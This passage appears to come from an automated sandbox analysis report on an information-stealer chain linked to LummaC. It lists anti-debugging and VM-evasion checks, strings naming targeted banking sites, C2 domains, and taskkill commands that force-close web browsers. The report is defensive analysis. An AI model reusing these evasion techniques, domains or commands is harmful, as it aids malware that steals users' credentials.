Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4048 Thread sleep time: -946473s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1944 Thread sleep count: 486 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1944 Thread sleep time: -972486s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6540 Thread sleep count: 273 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6540 Thread sleep time: -8190000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5308 Thread sleep count: 1697 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5308 Thread sleep time: -3395697s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1880 Thread sleep count: 1951 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1880 Thread sleep time: -3903951s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2760 Thread sleep count: 1933 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2760 Thread sleep time: -3867933s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 964 Thread sleep time: -360000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1968 Thread sleep count: 477 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1968 Thread sleep time: -954477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe TID: 1016 Thread sleep time: -30015s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe TID: 6940 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe TID: 7080 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe TID: 7044 Thread sleep count: 128 > 30
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe TID: 7044 Thread sleep count: 146 > 30
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe TID: 3616 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe TID: 1408 Thread sleep time: -120000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe TID: 5940 Thread sleep count: 392 > 30
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe TID: 5940 Thread sleep count: 147 > 30
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe TID: 6940 Thread sleep time: -96000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe TID: 5392 Thread sleep time: -922337203685477s >= -30000s
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Thread delayed: delay time: 922337203685477
Source: 58ce8f976c.exe, 0000000C.00000003.3069968984.0000000006028000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: 7YW0363WEKP7ULOI0QRA.exe, 00000003.00000002.2507260768.0000000000CB2000.00000040.00000001.01000000.00000006.sdmp, S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe, S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe, 00000004.00000002.2427168809.0000000000FF9000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, skotes.exe, 00000005.00000002.2465538734.0000000000C89000.00000040.00000001.01000000.0000000B.sdmp, 7451ae0b11.exe, 0000000B.00000002.3003413750.00000000005B8000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 58ce8f976c.exe, 0000000C.00000003.3069968984.0000000006028000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: 58ce8f976c.exe, 0000000C.00000003.3069968984.0000000006028000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: 58ce8f976c.exe, 0000000C.00000003.3069968984.0000000006028000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696487552f
Source: 58ce8f976c.exe, 0000000C.00000003.3069968984.0000000006028000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: 58ce8f976c.exe, 0000000C.00000003.3069968984.0000000006028000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: file.exe, file.exe, 00000000.00000003.2218579742.00000000014EC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2173591731.00000000014EC000.00000004.00000020.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2911175052.0000000000F3E000.00000004.00000020.00020000.00000000.sdmp, 7451ae0b11.exe, 0000000B.00000002.3004186690.0000000000FB2000.00000004.00000020.00020000.00000000.sdmp, 7451ae0b11.exe, 0000000B.00000002.3004186690.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3225777769.0000019E3D140000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: 58ce8f976c.exe, 0000000C.00000003.3069968984.0000000006028000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: firefox.exe, 0000001A.00000002.3228922756.0000019E471AC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW : 2 : 34 : 1 : 1 : 0x20026 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 1234191b-4bf7-4ca7-86e0-dfd7c32b5445
Source: 58ce8f976c.exe, 0000000C.00000003.3069968984.0000000006028000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: 58ce8f976c.exe, 0000000C.00000003.3069968984.000000000602D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696487552p
Source: 58ce8f976c.exe, 0000000C.00000003.3069968984.0000000006028000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: 58ce8f976c.exe, 0000000C.00000003.3069968984.0000000006028000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696487552
Source: 58ce8f976c.exe, 0000000C.00000003.3069968984.0000000006028000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696487552o
Source: 58ce8f976c.exe, 0000000A.00000003.2944432729.0000000000FB8000.00000004.00000020.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2911175052.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Pa5EAKvthdjN8x+2wmzDJakYn5ahGFs6BBUbN_
Source: file.exe, 00000000.00000003.2186543484.0000000005BDB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2186331939.0000000005BDB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2186701959.0000000005BDB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2214986734.0000000005BE5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2214639529.0000000005BDB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2214723198.0000000005BE1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2186170971.0000000005BD2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2197032834.0000000005BDB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2197243172.0000000005BE1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: lqeMuUnwoUAFmVCh
Source: 58ce8f976c.exe, 0000000C.00000003.3069968984.0000000006028000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696487552
Source: 58ce8f976c.exe, 0000000C.00000003.3069968984.0000000006028000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: 58ce8f976c.exe, 0000000C.00000003.3069968984.0000000006028000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: 58ce8f976c.exe, 0000000C.00000003.3069968984.0000000006028000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696487552j
Source: 58ce8f976c.exe, 0000000C.00000003.3069968984.0000000006028000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: 58ce8f976c.exe, 0000000C.00000003.3069968984.0000000006028000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: 58ce8f976c.exe, 0000000C.00000003.3069968984.0000000006028000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: 58ce8f976c.exe, 0000000C.00000003.3069968984.0000000006028000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: 58ce8f976c.exe, 0000000C.00000003.3069968984.0000000006028000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: 58ce8f976c.exe, 0000000C.00000003.3069968984.0000000006028000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: 58ce8f976c.exe, 0000000C.00000003.3069968984.0000000006028000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: 58ce8f976c.exe, 0000000C.00000003.3069968984.0000000006028000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: 7451ae0b11.exe, 0000000B.00000002.3004186690.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: 58ce8f976c.exe, 0000000C.00000003.3069968984.0000000006028000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: 58ce8f976c.exe, 0000000C.00000003.3069968984.0000000006028000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: 58ce8f976c.exe, 0000000C.00000003.3069968984.0000000006028000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696487552s
Source: 58ce8f976c.exe, 0000000C.00000003.3069968984.0000000006028000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: 58ce8f976c.exe, 0000000C.00000003.3069968984.0000000006028000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: 58ce8f976c.exe, 0000000C.00000003.3069968984.0000000006028000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: 7YW0363WEKP7ULOI0QRA.exe, 00000003.00000002.2507260768.0000000000CB2000.00000040.00000001.01000000.00000006.sdmp, S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe, 00000004.00000002.2427168809.0000000000FF9000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000005.00000002.2465538734.0000000000C89000.00000040.00000001.01000000.0000000B.sdmp, 7451ae0b11.exe, 0000000B.00000002.3003413750.00000000005B8000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: 58ce8f976c.exe, 0000000C.00000003.3069968984.0000000006028000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: 58ce8f976c.exe, 0000000C.00000003.3069968984.0000000006028000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\DP4Z2JGIRNCYT3CKHONMY.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe Thread information set: HideFromDebugger
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\DP4Z2JGIRNCYT3CKHONMY.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\DP4Z2JGIRNCYT3CKHONMY.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\DP4Z2JGIRNCYT3CKHONMY.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Code function: 3_2_00CAD585 rdtsc 3_2_00CAD585
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Code function: 3_2_00B1B974 LdrInitializeThunk, 3_2_00B1B974
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: 7451ae0b11.exe PID: 6196, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\num[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe, type: DROPPED
LummaC encrypted strings found
Source: file.exe, 00000000.00000003.2143331611.0000000005100000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: scriptyprefej.store
Source: file.exe, 00000000.00000003.2143331611.0000000005100000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: navygenerayk.store
Source: file.exe, 00000000.00000003.2143331611.0000000005100000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: founpiuer.store
Source: file.exe, 00000000.00000003.2143331611.0000000005100000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: necklacedmny.store
Source: file.exe, 00000000.00000003.2143331611.0000000005100000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: thumbystriw.store
Source: file.exe, 00000000.00000003.2143331611.0000000005100000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: fadehairucw.store
Source: file.exe, 00000000.00000003.2143331611.0000000005100000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: crisiwarny.store
Source: file.exe, 00000000.00000003.2143331611.0000000005100000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: presticitpo.store
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe "C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe "C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe "C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Uses taskkill to terminate processes
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: 760934cb92.exe, 0000000D.00000000.3024294213.0000000000932000.00000002.00000001.01000000.0000000F.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe, skotes.exe Binary or memory string: #3Program Manager
Source: 7YW0363WEKP7ULOI0QRA.exe, 7YW0363WEKP7ULOI0QRA.exe, 00000003.00000002.2507726360.0000000000D08000.00000040.00000001.01000000.00000006.sdmp Binary or memory string: "fProgram Manager
Source: firefox.exe, 0000001A.00000002.3217054997.00000045F48BB000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: ?Progman
Source: S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe, 00000004.00000002.2427168809.0000000000FF9000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000005.00000002.2465538734.0000000000C89000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: #3Program Manager
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe VolumeInformation Jump to behavior
